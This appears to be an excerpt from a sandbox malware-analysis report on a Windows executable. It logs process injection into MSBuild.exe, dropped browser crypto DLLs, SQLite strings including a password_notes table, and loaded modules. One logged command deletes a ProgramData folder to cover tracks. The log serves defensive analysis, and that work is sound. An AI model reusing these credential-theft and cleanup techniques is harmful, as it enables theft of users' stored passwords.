Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: DAKEBA.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\f1r6P3j3g7.exe "C:\Users\user\Desktop\f1r6P3j3g7.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 840
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: f1r6P3j3g7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: f1r6P3j3g7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: f1r6P3j3g7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000003.00000002.2206196527.00000000359F7000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000003.00000002.2195422275.0000000029B1F000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr

Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: f1r6P3j3g7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcA